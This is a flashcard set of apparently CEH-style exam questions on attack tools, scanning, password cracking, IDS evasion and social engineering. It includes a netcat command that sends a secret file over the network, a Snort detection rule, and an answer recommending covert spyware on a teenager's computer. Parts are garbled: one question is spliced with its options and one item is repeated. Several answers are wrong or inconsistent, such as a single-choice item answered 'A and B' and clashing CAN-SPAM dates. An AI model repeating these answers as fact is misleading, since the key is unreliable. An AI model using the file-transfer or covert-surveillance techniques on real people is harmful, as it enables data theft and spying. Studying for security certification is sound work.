• Shuffle
    Toggle On
    Toggle Off
  • Alphabetize
    Toggle On
    Toggle Off
  • Front First
    Toggle On
    Toggle Off
  • Both Sides
    Toggle On
    Toggle Off
  • Read
    Toggle On
    Toggle Off
Reading...
Front

Card Range To Study

through

image

Play button

image

Play button

image

Progress

1/547

Click to flip

Use LEFT and RIGHT arrow keys to navigate between flashcards;

Use UP and DOWN arrow keys to flip the card;

H to show hint;

A reads text to speech;

547 Cards in this Set

  • Front
  • Back
Which of the following steganography utilities exploits the nature of white space and allows the
user to conceal information in these white spaces?

A. Gif-It-Up
B. Image Hide
C. NiceText
D. Snow
D. Snow

Snow is used to conceal messages in ASCII text by appending whitespace to the end of lines. Because spaces and tabs are generally not visible in text viewers, the message is effectively hidden from casual observers. And if the built-in encryption is used, the message cannot be read even if it is detected.
In the context of Trojans, what is the definition of a Wrapper?

A. A tool used to encapsulate packets within a new header and footer
B. An encryption tool to protect the Trojan
C. A tool used to calculate bandwidth and CPU cycles wasted by the Trojan
D. A tool used to bind the Trojan with a legitimate file
D. A tool used to bind the Trojan with a legitimate file.

Wrappers allow an attacker to take any executable back-door program and combine it with any legitimate executable, creating a Trojan horse without writing a single line of new code
When Jason moves a file via NFS over the company's network, you want to grab a copy of it by sniffing. Which of the following tool accomplishes this?

A. nfscopy
B. macof
C. filesnarf
D. webspy
C. Filesnarf

Filesnarf - sniffs files from NFS traffic.
OPTIONS:
-i "Interface" (Specify the interface to listen on)

-v "Versus" mode. (Invert the sense of matching, to
select non-matching files.

pattern (Specify regular expression for filename matching.)

expression (Specify a tcpdump(8) filter expression to select
traffic to sniff.)
SEE ALSO
Dsniff, nfsd
Derek has stumbled upon a wireless network and wants to assess its security. However, he does not find enough traffic for a good capture. He intends to use AirSnort on the captured traffic to crack the WEP key and does not know the IP address range or the AP. How can he generate
traffic on the network so that he can capture enough packets to crack the WEP key?

A. Use a session replay on the packets captured
B. Use KisMAC as it needs two USB devices to generate traffic
C. Use any ARP requests found in the capture
D. Use Ettercap to discover the gateway and ICMP ping flood tool to generate traffic
D. Use Ettercap. By forcing the network to answer to a lot of ICMP messages you can gather enough packets to
crack the WEP key.
The following is an entry captured by a network IDS. You are assigned the task of analyzing this
entry. You notice the value 0x90, which is the most common NOOP instruction for the Intel

A. The attacker is attempting a buffer overflow attack and has succeeded
B. The buffer overflow attack has been neutralized by the IDS
C. The attacker is creating a directory on the compromised machine
D. The attacker is attempting an exploit that launches a command-line shell
processor. You figure that the attacker is attempting a buffer overflow attack. You also notice
"/bin/sh" in the ASCII part of the output. As an analyst what would you conclude about the attack?
D. The attacker is attempting an exploit that launches a command line shell.
Bill has started to notice some slowness on his network when trying to update his company's website and while trying to access the website from the Internet. Bill asks the help desk manager if he has received any calls about slowness from the end users, but the help desk manager says that he has not. Bill receives a number of calls from customers that cannot access the company website and cannot purchase anything online. Bill logs on to a couple of his routers and notices that the logs show network traffic is at an all time high. He also notices that almost all the traffic is originating from a specific address.
Bill decides to use Geotrace to find out where the suspect IP is originates from. The Geotrace utility runs a traceroute and finds that the IP is coming from Panama. Bill knows that none of his customers are in Panama so he immediately thinks that his company is under a Denial of Service attack. Now Bill needs to find out more about the originating IP address. What Internet registry should Bill look in to find the IP address?

A. RIPE LACNIC
B. APNIC
C. ARIN
D. LACNIC
LACNIC is the Latin American and Caribbean Internet Addresses Registry that administers IP
addresses, autonomous system numbers, reverse DNS, and other network resources for that
region.
Bob has been hired to do a web application security test. Bob notices that the site is dynamic and must make use of a back end database. Bob wants to see if SQL Injection would be possible.
What is the first character that Bob should use to attempt breaking valid SQL request?

A. Semi Column
B. Single Quote
C. Exclamation Mark
D. Double Quote
B. Single quote.

In SQL single quotes are used around values in queries, by entering another single quote Bob tests if the application will submit a null value and probably returning an error.
Angela is trying to access an education website that requires a username and password to login.
When Angela clicks on the link to access the login page, she gets an error message stating that the page cannot be reached. She contacts the website's support team and they report that no one else is having any issues with the site. After handing the issue over to her company's IT
department, it is found that the education website requires any computer accessing the site must be able to respond to a ping from the education website's server. Since Angela's computer is behind a
corporate firewall, her computer cannot ping the education website back.
What can Angela's IT department do to get access to the education website?

A. Use an Internet browser other than the one that Angela is currently using
B. Change the settings on the firewall to allow all incoming traffic on port 80
C. Change the IP on Angela's computer to an address outside the firewall
D. Change the settings on the firewall to allow all outgoing traffic on port 80
C. Change the IP on Angela's computer to an address outside the firewall.

Allowing traffic to and from port 80 will not help as this will be UDP or TCP traffic and ping uses ICMP. The browser used by the user will not make any difference. The only alternative here that would solve the problem is to move the computer to outside the firewall.
Null sessions are un-authenticated connections (not using a username or password.) to an NT or
2000 system. Which TCP and UDP ports must you filter to check null sessions on your network?

A. 137 and 139
B. 137 and 443
C. 139 and 445
D. 139 and 443
C. 139 and 445.

NULL sessions take advantage of "features" in the SMB (Server Message Block) protocol that
exist primarily for trust relationships. You can establish a NULL session with a Windows host by
logging on with a NULL user name and password. Primarily the following ports are vulnerable if
they are accessible: 137-139, 445.
While ports 137-139 were known technically as "NBT over IP", port 445 is "SMB over IP". (SMB is known as "Samba" and stands for "Server Message Blocks".) After all of the trouble the personal computer industry has had with Microsoft's original Windows NetBIOS ports 137 through 139, it is difficult to imagine or believe that Microsoft could have actually made things significantly worse with their replacement port 445 . . . but they did.
What type of port scan is shown below?
Scan directed at open port:

A. Windows Scan
B. Idle Scan
C. SYN Stealth Scan
D. XMAS Scan
D. XMAS Scan
Null sessions are un-authenticated connections (not using a username or password.) to an NT or
2000 system. Which TCP and UDP ports must you filter to check null sessions on your network?
A. 137 and 139
B. 137 and 443
C. 139 and 445
D. 139 and 443
C. 139 and 445.
NULL sessions take advantage of "features" in SMB (Server Message Block) protocol that exist primarily for trust relationships. You can establish a NULL session with a Windows host by logging on with a NULL userID and password.
An attacker runs netcat tool to transfer a secret file between two hosts:

Machine A: netcat -l -p 1234 < secretfile
achine

He is worried about information being sniffed on the network. How would the attacker use netcat to
encrypt the information before transmitting onto the wire?

A. netcat 192.168.3.4 > 1234
B. Use cryptcat instead of netcat
C. Machine A: netcat -l -p -s password 1234 < testfile
Machine B: netcat <machine A IP> 1234
D. Machine A: netcat -l -e magickey -p 1234 < testfile
Machine B: netcat <machine A IP> 1234
E. Machine A: netcat -l -p 1234 < testfile -pw password
Machine B: netcat <machine A IP> 1234 -pw password
B. Use Cryptcat. Netcat cannot encrypt hte file transfer itself, but would need to sue a third party application to encrypt/decrypt like openssl. Cryptcat is the standard netcat enhanced with twofish encryption.
LAN Manager passwords are concatenated to 14 bytes, and split in half. The two halves are
hashed individually. If the password is 7 characters or less, than the second half of the hash is always:

A. 0xAAD3B435B51404AA
B. 0xAAD3B435B51404CC
C. 0xAAD3B435B51404BB
D. 0xAAD3B435B51404EE
D. 0xAAD3B435B51404EE

The problem with LM stems form the total lack of salting or cipher block chaining in the hashing process. To hash a PW, the first 7 bytes of it are transformed into an 8 byte odd parity DES key. This key is used to encrypt the 8 byte string. "KGS!@". Same thing happens with the second part of the PW. This lack of salting creates two interesting consequences: First the PW is always stored in the same way (begging for a lookup table attack). Second, it is easier to determine whether a PW is bigger than 7 bytes in size. If it is not, the last 7 bytes will all be null and result in a consistent DES hash of 0xAAD3B435B51404EE.
Lori has just been tasked by her supervisor toonduct vulnerability scan on the corporate
network.She has been instructed to perform a very thorough test of the network to ensure that
there are no security holes on any of the machines.Lori's company does not own any commercial
scanning products, so she decides to download a free one off the Internet.Lori has never done a vulnerability scan before, so she is unsure of some of the settings available in the software she
downloaded.One of the options is to choose which ports that can be scanned.Lori wants to do exactly what her boss has told her, but she does not know what ports should be scanned.
If Lori is supposed to scan all known TCP ports, how many ports should she select in the
software?
A. 1025
B. 1024
C. 65536
D. Lori should not scan TCP ports, only UDP ports
C. 65536

In both TCP and UDP, each packet header will specify a source port and a destination port, each of which is a 16 bit unsigned integer (e.g. ranging from 0 to 65535)
Hackers usually control Bots through:
A. MSN Messenger
B. Trojan client software
C. GoogleTalk
D. Yahoo Chat
E. IRC Channel
E. IRC Channel

Most of the bots have a function to connect to a predetermined IRC channel to receive orders.
NetBIOS over TCP/IP allows files and/or printers to be shared over the network. You are trying to
intercept the traffic from a victim machine to a corporate network printer. You are attempting to
hijack the printer network connection from your laptop by sniffing the wire.
Which port does SMB over TCP/IP use?

A. 445
B. 139
C. 179
D. 443
A. Port 445
You ping a target IP to check if the host is up. You do not get a response. You suspect ICMP is
blocked at the firewall. Next you use hping2 tool to ping the target host and you get a response.
Why does the host respond to hping2 and not ping packet?
[ceh]# ping 10.2.3.4
PING 10.2.3.4 (10.2.3.4) from 10.2.3.80 : 56(84) bytes of data.
--- 10.2.3.4 ping statistics ---
3 packets transmitted, 0 packets received, 100% packet loss
[ceh]# ./hping2 -c 4 -n -i 2 10.2.3.4
HPING 10.2.3.4 (eth0 10.2.3.4): NO FLAGS are set, 40 headers +
0 data bytes
len=46 ip=10.2.3.4 flags=RA seq=0 ttl=128 id=54167 win=0 rtt=0.8 ms
len=46 ip=10.2.3.4 flags=RA seq=1 ttl=128 id=54935 win=0 rtt=0.7 ms
len=46 ip=10.2.3.4 flags=RA seq=2 ttl=128 id=55447 win=0 rtt=0.7 ms
len=46 ip=10.2.3.4 flags=RA seq=3 ttl=128 id=55959 win=0 rtt=0.7 ms
--- 10.2.3.4 hping statistic ---
4 packets tramitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 0.7/0.8/0.8 ms

A. hping2 uses TCP instead of ICMP by default
B. you must use ping10.2.3.4 switch
C. ping packets cannot bypass firewalls
D. hping2 uses stealth TCP packets to connect
A. hping2 uses TCP instead of ICMP by default

Default protocol is TCP, by default hping2 will send tcp headers to target host's port 0 with a
winsize of 64 without any tcp flag on. Often this is the best way to do an 'hide ping', useful when
target is behind a firewall that drop ICMP. Moreover a tcp null-flag to port 0 has a good probability of not being logged.
In the context of Windows Security, what is a 'null' user?
A. An account that has been suspended by the admin
B. A pseudo account that was created for security administration purpose
C. A pseudo account that has no username and password
D. A user that has no skills
C. A pseudo account that has no username and password.

NULL sessions take advantage of "features" in the SMB (Server Message Block) protocol that
exist primarily for trust relationships. You can establish a NULL session with a Windows host by
logging on with a NULL user name and password. Using these NULL connections allows you to
gather the following information from the host: * List of users and groups * List of machines * List
of shares * Users and host SID' (Security Identifiers)
NULL sessions exist in windows networking to allow: * Trusted domains to enumerate resources *
Computers outside the domain to authenticate and enumerate users * The SYSTEM account to
authenticate and enumerate resources
NetBIOS NULL sessions are enabled by default in Windows NT and 2000. Windows XP and 2003 will allow anonymous enumeration of shares, but not SAM accounts.
Which definition below best describes a covert channel?
A. A server program using a port that is not well known
B. It is one of the weak channels used by WEP that makes it insecure
C. Making use of a protocol in a way it was not intended to be used
D. It is the multiplexing taking place on a communication link
C. Making use of a protocol in a way it was not intended to be used.

A covert channel is a hidden communication channel not intended for information transfer at all.
Redundancy can often be used to communicate in a covert way. There are several ways that hidden communication can be set up.
You have installed antivirus software and you want to be sure that your AV signatures are working correctly. You don't want to risk the deliberate introduction of a live virus to test the AV software.
You would like to write a harmless test virus, which is based on the European Institute for Computer Antivirus Research format that can be detected by the AV software.
How should you proceed?

A. Type the following code in notepad and save the file as SAMPLEVIRUS.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it.
X5O!P%@AP[4\PZX54(P^)7CC)7}$SAMPLEVIRUS-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

B. Type the following code in notepad and save the file as EICAR.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it.
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

C. Type the following code in notepad and save the file as AVFILE.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it.
X5O!P%@AP[4\PZX54(P^)7CC)7}$AVFILE-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

D. Type the following code in notepad and save the file as TESTAV.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it.
X5O!P%@AP[4\PZX54(P^)7CC)7}$TESTAV-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
B. Type the following code in notepad and save the file as EICAR.COM. Your antivirus protram springs into action whenever you attempt to open, run or copy it.
Paula works as the primary help desk contact for her company.Paula has just received a call from a user reporting that his computer just displayed a Blue Screen of Death and he can no
longer work. Paula walks over to the user's computer and sees the Blue Screen of Death
screen.The user's computer is running Windows XP, but the Blue Screen looks like a familiar one that Paula had seen on Windows 2000 computers periodically.
The user said he stepped away from his computer for only 15 minutes and when he got back, the Blue Screen was there.Paula also noticed that the hard drive activity light was flashing, meaning
that the computer was processing something.Paula knew this should not be the case since the computer should be completely frozen during a Blue Screen. She checks the network IDS live log entries and notices numerous nmap scan alerts.
What is Paula seeing happen on this computer?

A. Paula's network was scanned using Floppyscan
B. There was IRQ conflict in Paula's PC
C. Paula's network was scanned using Dumpsec
D. Tools like Nessus will cause BSOD
A. Paula's network was scanned using Floppyscan.

Floppyscan is a dangerous hacking tool which can be used to portscan a system using a floppy disk.
How would you describe an attack where an attacker attempts to deliver the payload over multiple
packets over long periods of time with the purpose of defeating simple pattern matching in IDS
systems without session reconstruction? A characteristic of this attack would be a continuous
stream of small packets.

A. Session Splicing
B. Session Stealing
C. Session Fragmentation
D. Session Hijacking
A. Session Splicing
In an attempt to secure his wireless network, Bob turns off broadcasting of the SSID. He
concludes that since his access points require the client computer to have the proper SSID, it
would prevent others from connecting to the wireless network. Unfortunately unauthorized users
are still able to connect to the wireless network. Why do you think this is possible?

A. The SSID is still sent inside both client and AP packets
B. Bob forgot to turn off DHCP
C. Bob's solution only works in ad-hoc mode
D. All access points are shipped with a default SSID
A and B.

The SSID is still sent inside both client and AP packets, and Bob forgot to turn of DHCP. All access points are shipped with a default SSID unique to the manufacturer. E.g. 3COM uses the default comcomcom.
What is the advantage in encrypting the communication between the agent and the monitor in an Intrusion Detection System?

A. Encryption of agent communications will conceal the presence of the agents
B. Alerts are sent to the monitor when a potential intrusion is detected
C. An intruder could intercept and delete data or alerts and the intrusion can go undetected
D. The monitor will know if counterfeit messages are being generated because they will not be encrypted
D. The monitor will know if counterfeit messages are being generated because they will not be encrypted.
Ron has configured his network to provide strong perimeter security. As part of his network
architecture, he has included a host that is fully exposed to attack. The system is on the public
side of the demilitarized zone, unprotected by a firewall or filtering router. What would you call such a host? Choose all that are correct.
A. DMZ host
B. Honeypot
C. DWZ host
D. Bastion Host
B, D.

Ron has set up both a bastion Host and a honeypot.

A bastion host is a gateway between an inside network and an outside network. Used as a security measure, the bastion host is designed to defend against attacks aimed at the inside network. Depending on the complexity of the network and its configuration, a single bastion host may stand guard by itself, or be part of a larger security system with layers of protection.
Bob is going to perform an active session hijack against Brownies Inc. He has found a target that
allows session oriented connections (Telnet) and performs the sequence prediction on the target
operating system. He manages to find an active session due to the high level of traffic on the network. What is Bob supposed to do next?

A. Reverse sequence prediction
B. Take one of theparties offline
C. Guess the sequence numbers
D. Take over the session
C. Guess the sequence numbers
Which of the following snort rules look for FTP root login attempts?
A. alert ftp -> ftp (content:"user password root";)
B. alert tcp any any -> any any 21 (content:"user root";)
C. alert tcp -> any port 21 (message:"user root";)
D. alert tcp -> any port 21 (msg:"user root";)
B. alert tcp any any -> any any 21 (content: "user root";)

The snort rule header is built by defining action (alert), protocol (tcp), from IP subnet port (any
any), to IP subnet port (any any 21), Payload Detection Rule Options (content:"user root "; )
An attacker has been successfully modifying the purchase price of items purchased at a web site.
The security administrators verify the web server and Oracle database have not been
compromised directly. They have also verified the IDS logs and found no attacks that could have
caused this. What is the mostly likely way the attacker has been able to modify the price?
A. By using SQL injection
B. By changing hidden form values in a local copy of the web page
C. By using cross site scripting
D. There is no way the attacker could do this without directly compromising either the web server or the database
B. By changing hidden form values in a local copy of the web page.

Changing hidden form values is possible when a web site is poorly built and is trusting the visitor's computer to submit vital data like the price of a product, to the database.
Why is Social Engineering considered attractive by hackers and commonly done by experts in the
field?
A. It is easy and extremely effective to gain information
B. It is done by well-known hackers
C. It does not require a computer in order to commit a crime
D. It is not considered illegal
A. It is easy and extremely effective to gain information.

Social engineering is a collection of techniques used to manipulate people into performing actions
or divulging confidential information. While similar to a confidence trick or simple fraud, the term
typically applies to trickery for information gathering or computer system access and in most (but
not all) cases the attacker never comes face-to-face with the victim. The term has been
popularized in recent years by well known (reformed) computer criminal and security consultant
Kevin Mitnick who points out that it's much easier to trick someone into giving you his or her
password for a system than to spend the effort to hack in. He claims it to be the single most
effective method in his arsenal.
Harold just got home from working at Henderson LLC where he works as an IT technician. He was able to get off early because they were not too busy. When he walks into his home office, he notices his teenage daughter on the computer, apparently chatting with someone online. As soon
as she hears Harold enter the room, she closes all her windows and tries to act like she was playing a game. When Harold asks her what she was doing, she acts very nervous and does not give him a straight answer. Harold is very concerned because he does not want his daughter to fall victim to online predators and the sort. Harold doesn't necessarily want to install any programs that will restrict the sites his daughter goes to, because he doesn't want to alert her to his trying to figure out what she is doing.
Harold wants to use some kind of program that will track her activities online, and send Harold an email of her activity once a day so he can see what she has been up to. What kind of software could Harold use to accomplish this?

A. Install VNC on her computer
B. Install hardware Keylogger on her computer
C. Enable Remote Desktop on her computer
D. Install screen capturing Spyware on her computer
D. Install screen capturing spyware on her computer.
How do you defend against ARP Spoofing?
A. Use ARPWALL system and block ARP spoofing attacks
B. Use private VLANS
C. Tune IDS Sensors to look for large amount of ARP traffic on local subnets
D. Place static ARP entries on servers, workstation and routers

Choose all that apply.
B, C, D: Use private VLANs, Tune IDS sensors to look for large amounts of ARP traffic on local subnets, and place static ARP entries on servers, workstations and routers.

ARPWALL is an opensource tool that will give early warning when an arp attack occurs.
Jim's organization just completed a major Linux roll out and now all of the organization's systems
are running the Linux 2.5 kernel. The roll out expenses have imposed constraints on purchasing other essential security equipment and software. The organization requires an option to control network traffic and also perform stateful inspection of traffic going into and out of the DMZ. Which built-in functionality of Linux can achieve this?

A. IP Chains
B. IP ICMP
C. IP Sniffer
D. IP Tables
D. IP Tables.

iptables is a user space application that allows a sysadmin to configure the netfilter tables, chains and rules (described above) Because iptables requires elevated privileges to operate, it must be executed by user root, otherwise it fails to function. On most Linux systems, iptables is installed as /usr/sbin/iptables. iptables performs stateful inspection while the older ipchains only performs stateless inspection.
Richard is a network administrator working at a student loan company in Iowa. This company processes over 20,000 student loans a year from colleges all over the state. Most communication
between the company, schools, and lenders is carried out through email. Because of privacy laws
that are in the process of being implemented, Richard wants to get ahead of the game and become compliant before any sort of auditing occurs. Much of the email communication used at
his company contains sensitive information such as social security numbers. For this reason, Richard wants to utilize email encryption agency-wide. The only problem for Richard is that his
department only has a couple of servers, and they are utilized to their full capacity. Since a serverbased PKI is not an option for him, he is looking for a low/no cost solution to encrypt email.

What should Richard use?
A. 3DES
B. RSA
C. PGP
D. OTP
C. PGP.

PGP is an encryption program being used for the secure transmission of files and e-mails. This adapts public-key encryption technology, in which pairs of keys are used to maintain secure communication. In PGP communication, the sender and the receiver each have public and private key pairs.
Samantha has been actively scanning the client network for which she is doing a vulnerability assessment test. While doing a port scan she notices ports open in the 135 to 139 range. What protocol is most likely to be listening on those ports?

A. SMB
B. Finger
C. FTP
D. Samba
A. SMB

Port 135 is for RPC and 136-139 is for NetBIOS traffic. SMB is an upper layer service that runs on top of the Session Service and the Datagram service of NetBIOS.
What does ICMP (type 11, code 0) denote?
A. Destination Unreachable
B. Unknown Type
C. Source Quench
D. Time Exceeded
D. Time exceeded.

An ICMP Type 11, Code 0 means Time Exceeded (RFC792) Code 0 = Time to Live exceeded in transit, and Code 1 = Fragment Reassembly Time Exceeded.
LM authentication is not as strong as Windows NT authentication so you may want to disable its use, because an attacker eavesdropping on network traffic will attack the weaker protocol. A successful attack can compromise the user's password. How do you disable LM authentication in
Windows XP?

A. Disable LM authentication in the registry
B. Disable LSASS service in Windows XP
C. Stop the LM service in Windows XP
D. Download and install LMSHUT.EXE tool from Microsoft's website
A. Disable LM authentication in the registry.
Johnny is a member of the hacking group Orpheus1. He is currently working on breaking into the Department of Defense's front end Exchange Server. He was able to get into the server, located in a DMZ, by using an unused service account that had a very weak password that he was able to guess. Johnny wants to crack the administrator password, but does not have a lot of time to crack it. He wants to use a tool that already has the LM hashes computed for all possible permutations of the administrator password. Which tool would best be used to accomplish this?

A. SMBCrack
B. RainbowCrack
C. SmurfCrack
D. PSCrack
B. RainbowCrack.

RainbowCrack is a general purpose implementation of Philippe Oechslin's faster time-memory trade-off technique. In short, the RainbowCrack tool is a hash-cracker. A traditional brute force cracker tries ALL possible plaintexts one at a time, and this is a time consuming way to break a complex password. The idea of a time-memory tradeoff is to do all cracking-time computation in advance, and store the results in a "rainbow table." Once the precomputation is finished, a time-memory trade off cracker can be hundreds of times faster than a brute-force cracker.
Basically, there are two approaches to network intrusion detection: signature detection, and anomaly detection. The signature detection approach utilizes well-known signatures for network traffic to identify potentially malicious traffic. The anomaly detection approach utilizes a previous history of network traffic to search for patterns that are abnormal, which would indicate an intrusion. How can an attacker disguise his buffer overflow attack signature such that there is a greater probability of his attack going undetected by the IDS?

A. He can chain NOOP instructions into a NOOP "sled" that advances the processor's instruction
pointer to a random place of choice
B. He can use polymorphic shellcode ?with a tool such as ADMmutate - to change the signature of
his exploit as seen by a network IDS
C. He can use a dynamic return address to overwrite the correct value in the target machine's
computer memory
D. He can use a shellcode that will perform a reverse telnet back to his machine
B. He can use polymorphic shellcode, with a tool such as ADMmutate - to change the signature of his exploit as seen by a network IDS

ADMmutate is using a polymorphic technique designed to circumvent certain forms of signature
based intrusion detection. All network based remote buffer overflow exploits have similarities in
how they function. ADMmutate has the ability to emulate the protocol of the service the attacker is
attempting to exploit. The data payload (sometimes referred to as an egg) contains the instructions
the attacker wants to execute on the target machine. These eggs are generally interchangeable
and can be utilized in many different buffer overflow exploits. ADMmutate uses several techniques
to randomize the contents of the egg in any given buffer overflow exploit. This randomization
effectively changes the content or 'signature' of the exploit without changing the functionality of the
exploit.
Which of the following encryption is not based on block cipher?
A. DES
B. Blowfish
C. RC4
D. AES (Rijndael)
C. RC4.

RC4 is used in numerous protocols including SSL and WEP.
SYN Flood is a DOS attack in which an attacker deliberately violates the three-way handshake and opens a large number of half-open TCP connections. The signature of attack for SYN Flood contains:

A. The source and destination port numbers having the same value
B. A large number of SYN packets appearing on a network with the corresponding reply packets
C. A large number of SYN packets appearing on a network without the corresponding reply
packets
D. The source and destination address having the same value
C. A large number of SYN packets appearing on a network without the corresponding ACK packets.

A SYN attack occurs when an attacker exploits the use of the buffer space during a Transmission
Control Protocol (TCP) session initialization handshake. The attacker floods the target system's small "in-process" queue with connection requests, but it does not respond when a target system
replies to those requests. This causes the target system to time out while waiting for the proper response, which makes the system crash or become unusable
Nathalie would like to perform a reliable scan against a remote target. She is not concerned about
being stealth at this point. Which of the following type of scans would be the most accurate and reliable?
A. A UDP scan
B. A FIN scan
C. A TCP Connect scan
D. A half-scan
C. A TCP Connect scan.

The connect ( ) system call provided by your OS is used to open a connection to every interesting port on the machine. If the port is listening, connect ( ) will succeed, otherwise the port isn't reachable. Advantages to this technique include that it doesn't require any elevated privileges. This is the fastest scanning technique supported by nmap, and is available iwth the -t (TCP) option. The downside is that this type of scan is easily detectable and filterable.
Virus Scrubbers and other malware detection program can only detect items they know about.
Which of the following tool would allow you to detect unauthorized changes or modification of binary files on your system by unknown malware?

A. Anti-Virus Software
B. A properly configured gateway
C. File integrity verification tools
D. There is no way of finding out until a new updated signature file is released
C. File integrity verification tools.

Programs like Tripwire aid SysAdmins and users in monitoring a designated set of files for any changes. Used with system files on a regular basis, Tripwire and similar tools can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely fashion.
You have successfully brute forced basic authentication configured on a Web server using Brutus hacking tool. The username / password is "Admin" and "Bettlemani@". You logon to the system using the brute forced password and plant backdoors and rootkits.
After downloading various sensitive documents from the compromised machine, you proceed to clear the log files to hide your trace.
Which event log located at c:\windows\system32\config contains the trace of your brute force attempts?

A. SecEvent.Evt
B. SysEvent.Evt
C. WinEvent.Evt
D. AppEvent.Evt
A. SecEvent.Evt

The Security Event log (SecEvent.Evt) will contain all the failed logins against the system.
In Buffer Overflow exploit, which of the following registers gets overwritten with return address of the exploit code?

A. EAP
B. EEP
C. ESP
D. EIP
D. EIP

EIP is the instruction pointer which is a register, it points to your next command.
Samuel is a high school teenager who lives in Modesto California. Samuel is a straight 'A' student
who really likes tinkering around with computers and other types of electronic devices. Samuel just received a new laptop for his birthday and has been configuring it ever since. While tweaking the
registry, Samuel notices a pop up at the bottom of his screen stating that his computer was now
connected to a wireless network. All of a sudden, he was able to get online and surf the Internet.
Samuel did some quick research and was able to gain access to the wireless router he was
connecting to and see all of its settings. Being able to hop onto someone else's wireless network
so easily fascinated Samuel, so he began doing more and more research on wireless technologies
and how to exploit them. The next day, Samuel's friend said that he could drive around all over
town and pick up hundreds upon hundreds of wireless networks. This really excited Samuel so
they got into his friend's car and drove around the city seeing which networks they could connect
to and which ones they could not.
What has Samuel and his friend just performed?

A. Wardriving
B. Warwalking
C. Warchalking
D. Webdriving
A. Wardriving.

Wardriving is the act of searching for Wi-Fi wireless networks by a person in a moving vehicle using a Wi-Fi-equipped computer, such as a laptop or a PDA, to detect the networks.
Neil notices that a single address is generating traffic from its port 500 to port 500 of several other machines on the network. This scan is eating up most of the network bandwidth and Neil is concerned. As a security professional, what would you infer from this scan?

A. It is a network fault and the originating machine is in a network loop
B. It is a worm that is malfunctioning or hardcoded to scan on port 500
C. The attacker is trying to detect machines on the network which have SSL enabled
D. The attacker is trying to determine the type of VPN implementation and checking for IPSec
D. The attacker is trying to determine the type of VPN implementation and checking for IPSec.

Port 500 is used by IKE (Internet Key Exchange). This is typically used for IPSEC-based VPN
software, such as Freeswan, PGPnet, and various vendors of in-a-box VPN solutions such as
Cisco. IKE is used to set up the session keys. The actual session is usually sent with ESP
(Encapsulated Security Payload) packets, IP protocol 50 (but some in-a-box VPN's such as Cisco
are capable of negotiating to send the encrypted tunnel over a UDP channel, which is useful for use across firewalls that block IP protocols other than TCP or UDP).
Rebecca is a security analyst and knows of a local root exploit that has the ability to enable local
users to use available exploits to gain root privileges. This vulnerability exploits a condition in the
Linux kernel within the execve() system call. There is no known workaround that exists for this
vulnerability. What is the correct action to be taken by Rebecca in this situation as a
recommendation to management?

A. Rebecca should make a recommendation to upgrade the Linux kernel promptly
B. Rebecca should make a recommendation to set all child-process to sleep within theexecve()
C. Rebecca should make a recommendation to disable theexecve() system call
D. Rebecca should make a recommendation to hire more system administrators to monitor all child processes to ensure that each child process can't elevate privilege
A. Rebecca should make a recommendation to upgrade the Linux kernel promptly.
WWW wanderers or spiders are programs that traverse many pages in the World Wide Web by
recursively retrieving linked pages. Search engines like Google, frequently spider web pages for
indexing.
How will you stop web spiders from crawling certain directories on your website?


A. Place "HTTP:NO CRAWL" on the html pages that you don't want the crawlers to index
B. Place robots.txt file in the root of your website with listing of directories that you don't want to be
crawled
C. Enable SSL on the restricted directories which will block these spiders from crawling
D. Place authentication on root directories that will prevent crawling from these spiders
B. Place robots.txt file in the root of your website with listing of directories that you don't want to be crawled.
Which of the following act in the United States specifically criminalizes the transmission of
unsolicited commercial e-mail (SPAM) without an existing business relationship.
A. 2004 CANSPAM Act
B. 1990 Computer Misuse Act
C. 2005 US-SPAM 1030 Act
D. 2003 SPAM Prevention Act
A. 2004 CANSPAM Act.

The CAN-SPAM Act of 2003 (Controlling the Assault of Non-Solicited Pornography and Marketing Act) establishes requirements for those who send commercial email, spells out penalties for spammers nad companies whose products are advertised in spam if they violate the law, and gives consumers the right to ask emailers to stop spamming them.
You are gathering competitive intelligence on an organization. You notice that they have jobs listed on a few Internet job-hunting sites. There are two jobs for network and system administrators. How can this help you in footprinting the organization?
A. The IP range used by the target network
B. An understanding of the number of employees in the company
C. The types of operating systems and applications being used
D. How strong the corporate security policy is
C. The types of operating systems and applications being used.

From job posting descriptions one can see which is the set of skills, technical knowledge, system experience required, hence it is possible to argue what kind of operating systems and applications the target organization is using
Samuel is the network administrator of DataX Communications, Inc. He is trying to configure his
firewall to block password brute force attempts on his network. He enables blocking the intruder's IP address for a period of 24 hours time after more than three unsuccessful attempts. He is
confident that this rule will secure his network from hackers on the Internet.
But he still receives hundreds of thousands brute-force attempts generated from various IP
addresses around the world. After some investigation he realizes that the intruders are using a
proxy somewhere else on the Internet which has been scripted to enable the random usage of
various proxies on each request so as not to get caught by the firewall rule.
Later he adds another rule to his firewall and enables small sleep on the password attempt so that
if the password is incorrect, it would take 45 seconds to return to the user to begin another
attempt. Since an intruder may use multiple machines to brute force the password, he also
throttles the number of connections that will be prepared to accept from a particular IP address.
This action will slow the intruder's attempts.
Samuel wants to completely block hackers brute force attempts on his network.
What are the alternatives to defending against possible brute-force password attacks on his site?
A. Enforce a password policy and use account lockouts after three wrong logon attempts even
though this might lock out legit users
B. You cannot completely block the intruders attempt if they constantly switch proxies
C. Enable the IDS to monitor the intrusion attempts and alert you by e-mail about the IP address of
the intruder so that you can block them at the Firewall manually
D. Enforce complex password policy on your network so that passwords are more difficult to brute force
B. You cannot completely block the intruder's attempt if they constantly switch proxies.

Without knowing from where the next attack will come there is no way of proactively block the
attack. This is becoming a increasing problem with the growth of large bot nets using ordinary workstations and home computers in large numbers.
Jack Hacker wants to break into Brown Co.'s computers and obtain their secret double fudge
cookie recipe. Jack calls Jane, an accountant at Brown Co., pretending to be an administrator
from Brown Co. Jack tells Jane that there has been a problem with some accounts and asks her to
verify her password with him ''just to double check our records.'' Jane does not suspect anything
amiss, and parts with her password. Jack can now access Brown Co.'s computers with a valid
user name and password, to steal the cookie recipe. What kind of attack is being illustrated here?

A. Faking Identity
B. Reverse Engineering
C. Social Engineering
D. Spoofing Identity
E. Reverse Psychology
C. Social engineering.

